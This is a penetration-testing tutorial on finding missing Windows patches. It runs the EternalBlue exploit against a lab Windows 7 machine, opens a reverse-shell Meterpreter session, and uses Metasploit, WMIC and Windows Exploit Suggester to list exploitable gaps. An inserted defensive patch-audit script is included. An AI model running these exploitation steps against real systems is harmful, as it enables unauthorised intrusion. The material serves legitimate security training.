
How to identify missing Windows patches for easier exploitation «Zero Byte :: WonderHowTo



No operating system contends with as many vulnerabilities as Windows, and keeping up with the latest fixes is often a race. From an attacker's point of view, knowing which patches are present on a Windows machine can make or break a successful exploitation attempt. Today, we will cover three methods for enumerating patches: Metasploit, WMIC, and Windows Exploit Suggester.

For Metasploit, we will use a post module to find missing patches. With WMIC, we will run commands directly from a shell on the system to list the installed hotfixes. And with Windows Exploit Suggester, we will compare the patches installed on the system against a database of vulnerabilities. We will be using Kali Linux to attack an unpatched version of Windows 7.

Method 1: Metasploit

The first method we will use to identify any missing patches on the target is Metasploit. Fire it up by typing msfconsole in the terminal.

  ~# msfconsole

  [-] *** Starting the Metasploit Framework console.../
  [-] * WARNING: No database support: No database YAML file
  [-] ***

         =[ metasploit v5.0.20-dev                          ]
  + -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
  + -- --=[ 546 payloads - 44 encoders - 10 nops            ]
  + -- --=[ 2 evasion                                       ]

  msf5 >

We need to compromise the machine and get a Meterpreter session in order to run the post module, and since we know this is an unpatched version of Windows 7, we can quickly exploit it with EternalBlue.

Load the module with the use command:

  msf5 > use exploit/windows/smb/ms17_010_eternalblue

Set the appropriate options and type run to launch the exploit:

  msf5 exploit(windows/smb/ms17_010_eternalblue) > run

  [*] Started reverse TCP handler on 10.10.0.1:1337
  [+] 10.10.0.104:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
  [*] 10.10.0.104:445 - Connecting to target for exploitation.
  [+] 10.10.0.104:445 - Connection established for exploitation.
  [+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
  [*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
  [*] 10.10.0.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
  [*] 10.10.0.104:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
  [*] 10.10.0.104:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
  [+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
  [*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
  [*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
  [*] 10.10.0.104:445 - Starting non-paged pool grooming
  [+] 10.10.0.104:445 - Sending SMBv2 buffers
  [+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  [*] 10.10.0.104:445 - Sending final SMBv2 buffers.
  [*] 10.10.0.104:445 - Sending last fragment of exploit packet!
  [*] 10.10.0.104:445 - Receiving response from exploit packet
  [+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
  [*] 10.10.0.104:445 - Sending egg to corrupted connection.
  [*] 10.10.0.104:445 - Triggering free of corrupted buffer.
  [*] Sending stage (206403 bytes) to 10.10.0.104
  [*] Meterpreter session 1 opened (10.10.0.1:1337 -> 10.10.0.104:49228) at 2019-10-27 12:28:32 -0500
  [+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  [+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  [+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  meterpreter >

We now have a Meterpreter session on the target. Since post modules work against an existing session running in the background, we first need to background our session:

  meterpreter > background

  [*] Backgrounding session 1...

Then we can load the post module with the use command:

  msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/enum_patches

If we type options, Metasploit will show us all the available options and settings for the current module:

  msf5 post(windows/gather/enum_patches) > options

  Module options (post/windows/gather/enum_patches):

     Name       Current Setting       Required  Description
     ----       ---------------       --------  -----------
     KB         KB2871997, KB2928120  yes       A comma separated list of KB patches to search for
     MSFLOCALS  true                  yes       Search for missing patches for which there is a MSF local module
     SESSION                          yes       The session to run this module on.

All we really need to set is the session number to run this on. We could specify a comma-separated list of additional patches to search for if we wanted, but for now the defaults work fine.

Use the set command to set the session number of the session we backgrounded:

  msf5 post(windows/gather/enum_patches) > set session 1

  session => 1

And type run to start it:

  msf5 post(windows/gather/enum_patches) > run

  [+] KB2871997 is missing
  [+] KB2928120 is missing
  [+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
  [+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
  [+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
  [+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
  [+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
  [+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
  [*] Post module execution completed

We can see that it reports the first two patches as missing, and it also lists some additional potential vulnerabilities along with the patches that address them.

Method 2: WMIC

The next method we will use to enumerate patches uses the built-in Windows WMIC tool. WMIC (Windows Management Instrumentation Command-Line) is a utility for performing WMI operations on Windows. It is used from the command line and can be run in both interactive and non-interactive modes.

To use this tool, we need a proper shell on the target. Fortunately, we already have a Meterpreter session running, so we can use it to get into a system shell.

Use the sessions command with the -i flag to interact with a session:

  msf5 > sessions -i 1

  [*] Starting interaction with 1...

  meterpreter >

This should put us back at the Meterpreter prompt. Simply type shell and we will be dropped into a system shell:

  meterpreter > shell

  Process 2452 created.
  Channel 1 created.
  Microsoft Windows [Version 6.1.7601]
  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

  C:\Windows\system32>

Now we should be able to use the WMIC utility to view all the installed patches. Enter wmic qfe list at the prompt to list all the Quick Fix Engineering (QFE) patches present on the system:

  C:\Windows\system32>wmic qfe list

  wmic qfe list
  Caption                                     CSName  Description  FixComments  HotFixID   InstallDate  InstalledBy        InstalledOn  Name  ServicePackInEffect  Status
  http://support.microsoft.com/?kbid=2534111  W02     Hotfix                    KB2534111                                  2/25/2019
  http://support.microsoft.com/?kbid=976902   W02     Update                    KB976902                W02\Administrator  11/21/2010

This gives us the ID, description, installation information, and the associated URL for each patch that is installed. We can also append full to the command for a slightly different view of this data:

  C:\Windows\system32>wmic qfe list full

  wmic qfe list full

  Caption=http://support.microsoft.com/?kbid=2534111
  CSName=W02
  Description=Hotfix
  FixComments=
  HotFixID=KB2534111
  InstallDate=
  InstalledBy=
  InstalledOn=2/25/2019
  Name=
  ServicePackInEffect=
  Status=

  Caption=http://support.microsoft.com/?kbid=976902
  CSName=W02
  Description=Update
  FixComments=
  HotFixID=KB976902
  InstallDate=
  InstalledBy=W02\Administrator
  InstalledOn=11/21/2010
  Name=
  ServicePackInEffect=
  Status=

This method is nice because it requires nothing more than a basic shell on the target to run WMIC.

Method 3: Windows Exploit Suggester

The last method we will use to identify missing patches is Windows Exploit Suggester. This is a tool written in Python that compares the patches installed on a target against a database of Microsoft vulnerabilities, all from our local machine.

Windows Exploit Suggester needs the output of systeminfo from the target in order to compare it against the database. Since we still have shell access on the target, we can run that command:

  C:\Windows\system32>systeminfo

  systeminfo

  Host Name:                 W02
  OS Name:                   Microsoft Windows 7 Professional
  OS Version:                6.1.7601 Service Pack 1 Build 7601
  OS Manufacturer:           Microsoft Corporation
  OS Configuration:          Member Workstation
  OS Build Type:             Multiprocessor Free
  Registered Owner:          admin2
  Registered Organization:
  Product ID:                00371-868-0000007-85704
  Original Install Date:     25/25/2019, 14:04:46 PM
  System Boot Time:          27/7/2019, 13:48:26 PM
  System Manufacturer:       QEMU
  System Model:              Standard PC (i440FX + PIIX, 1996)
  System Type:               x64-based PC
  Processor(s):              1 Processor(s) Installed.
                             [01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~2533 Mhz
  BIOS Version:              SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 1/1/2014
  Windows Directory:         C:\Windows
  System Directory:          C:\Windows\system32
  Boot Device:               \Device\HarddiskVolume1
  System Locale:             en-us;English (United States)
  Input Locale:              en-us;English (United States)
  Time Zone:                 (UTC-06:00) Central Time (US & Canada)
  Total Physical Memory:     2,047 MB
  Available Physical Memory: 1,461 MB
  Virtual Memory: Max Size:  4,095 MB
  Virtual Memory: Available: 3,494 MB
  Virtual Memory: In Use:    601 MB
  Page File Location(s):     C:\pagefile.sys
  Domain:                    dlab.env
  Logon Server:              N/A
  Hotfix(s):                 2 Hotfix(s) Installed.
                             [01]: KB2534111
                             [02]: KB976902
  Network Card(s):           1 NIC(s) Installed.
                             [01]: Intel(R) PRO/1000 MT Network Connection
                                   Connection Name: Local Area Connection
                                   DHCP Enabled:    Yes
                                   DHCP Server:     10.10.0.100
                                   IP address(es)
                                   [01]: 10.10.0.104
                                   [02]: fe80::104:336c:a632:e39b

And save the output to a text file on our local machine:

  ~# cat system_info.txt

  Host Name:                 W02
  OS Name:                   Microsoft Windows 7 Professional
  OS Version:                6.1.7601 Service Pack 1 Build 7601
  ...
  Hotfix(s):                 2 Hotfix(s) Installed.
                             [01]: KB2534111
                             [02]: KB976902
  ...

Next we need to download the script from GitHub. The easiest way to do that is with wget:

  ~# wget https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

  --2019-10-27 12:38:34--  https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
  Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
  Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 69175 (68K) [text/plain]
  Saving to: 'windows-exploit-suggester.py'

  windows-exploit-suggester.py  100%[======================================================================================================================>]  67.55K  --.-KB/s    in 0.07s

  2019-10-27 12:38:34 (951 KB/s) - 'windows-exploit-suggester.py' saved [69175/69175]

Then install the dependencies, which in this case is only the python-xlrd package:

  ~# apt-get install python-xlrd

  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  The following NEW packages will be installed:
    python-xlrd
  0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
  Need to get 104 kB of archives.
  After this operation, 490 kB of additional disk space will be used.
  Get:1 http://kali.download/kali kali-rolling/main amd64 python-xlrd all 1.1.0-1 [104 kB]
  Fetched 104 kB in 1s (144 kB/s)
  Selecting previously unselected package python-xlrd.
  (Reading database ... 408990 files and directories currently installed.)
  Preparing to unpack .../python-xlrd_1.1.0-1_all.deb ...
  Unpacking python-xlrd (1.1.0-1) ...
  Setting up python-xlrd (1.1.0-1) ...
  Processing triggers for man-db (2.8.5-2) ...

Now that the tool is set up, we need to generate the database of Microsoft security bulletins. Windows Exploit Suggester can do this automatically with the --update flag:

  ~# python windows-exploit-suggester.py --update

  [*] initiating winsploit version 3.3...
  [+] writing to file 2019-10-27-mssb.xls
  [*] done

We should be good to go at this point. All we need to do is run the tool, specifying the systeminfo file from earlier and the database file we just created:

  ~# python windows-exploit-suggester.py --database 2019-10-27-mssb.xls --systeminfo system_info.txt

  [*] initiating winsploit version 3.3...
  [*] database file detected as xls or xlsx based on extension
  [*] attempting to read from the systeminfo input file

The script will run and return any patches that are missing from our target, along with relevant information and links:

  [+] systeminfo input file read successfully (ascii)
  [*] querying database file for potential vulnerabilities
  [*] comparing the 2 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
  [*] there are now 386 remaining vulns
  [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
  [+] windows version identified as 'Windows 7 SP1 64-bit'
  [*]
  [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
  [*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
  [*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
  [*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
  [*]
  [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
  [*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
  [*]
  [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
  [*]   https://github.com/foxglovesec/RottenPotato
  [*]   https://github.com/Kevin-Robertson/Tater
  [*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
  [*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
  [*]
  [E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
  [*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
  [*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
  [*]
  [E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
  [*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
  [*]
  [E] MS16-059: Security Update for Windows Media Center (3150220) - Important
  [*]   https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059), PoC
  [*]
  [E] MS16-056: Security Update for Windows Journal (3156761) - Critical
  [*]   https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
  [*]   http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker Memory Corruption

  ...

  [M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
  [M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
  [E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
  [M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
  [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
  [M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
  [M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
  [M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
  [M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
  [M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
  [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
  [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
  [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
  [*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
  [*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
  [*]
  [*] done

This method is perhaps the most thorough, because we are comparing the target against an up-to-date database of patches. It also has the advantage of running entirely on our own machine rather than on the target.
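The comparison at the heart of Method 2 and Method 3 is simple to automate, and a defender can run the same check as a patch-compliance audit. The following script is an added example (not code from the article or from Windows Exploit Suggester): it parses the Key=Value records printed by wmic qfe list full and the Hotfix(s) section of systeminfo, then reports which KBs from a required list are absent. The sample outputs are constructed to mirror host W02 above, and the required list (the two default KBs of the enum_patches module) is an assumption a defender would replace with their own baseline.

```python
import re
from typing import Dict, List, Set

# Constructed sample in the Key=Value layout of 'wmic qfe list full'
# (hypothetical records modelled on host W02 in the article).
WMIC_QFE_FULL = """
Caption=http://support.microsoft.com/?kbid=2534111
Description=Hotfix
HotFixID=KB2534111
InstalledOn=2/25/2019

Caption=http://support.microsoft.com/?kbid=976902
Description=Update
HotFixID=KB976902
InstalledBy=W02\\Administrator
InstalledOn=11/21/2010
"""

# Constructed sample of the Hotfix(s) section as systeminfo prints it.
SYSTEMINFO = """
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
"""

# Assumed baseline: the two KBs the enum_patches module checks for by default.
REQUIRED_KBS = ["KB2871997", "KB2928120"]


def parse_wmic_qfe_full(text: str) -> List[Dict[str, str]]:
    """One dict per record; a blank line closes a record."""
    records, current = [], {}
    for line in text.splitlines() + [""]:        # sentinel flushes the last record
        if "=" in line:
            key, _, value = line.partition("=")  # split at the first '=' only (URLs contain '=')
            current[key.strip()] = value.strip()
        elif current:
            records.append(current)
            current = {}
    return records


def hotfixes_from_wmic(text: str) -> Set[str]:
    """Installed KB ids taken from the HotFixID field of each wmic record."""
    return {r["HotFixID"].upper() for r in parse_wmic_qfe_full(text) if "HotFixID" in r}


def hotfixes_from_systeminfo(text: str) -> Set[str]:
    """KB ids under the Hotfix(s) heading; the next unindented field ends the list."""
    section = re.search(r"^Hotfix\(s\):.*?(?=^\S|\Z)", text, re.M | re.S)
    return set(re.findall(r"\[\d+\]:\s*(KB\d+)", section.group(0))) if section else set()


def missing_kbs(installed: Set[str], required: List[str]) -> List[str]:
    """Required KBs that are not installed, in the order they were requested."""
    return [kb for kb in required if kb.upper() not in installed]
```

Feed it the real wmic or systeminfo capture and a baseline of KBs your patch policy requires, and the returned list is the gap to close; an empty list from both parsers means the two sources agree and nothing from the baseline is missing.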

Wrapping Up

In this tutorial, we looked at a few methods of identifying missing patches on a Windows machine. First we used a Metasploit post module, then the WMIC tool on Windows, and finally the Windows Exploit Suggester Python script. Enumerating patches is extremely important when attacking Windows, as it narrows the number of potential exploits, saves time, and generally makes the job easier.

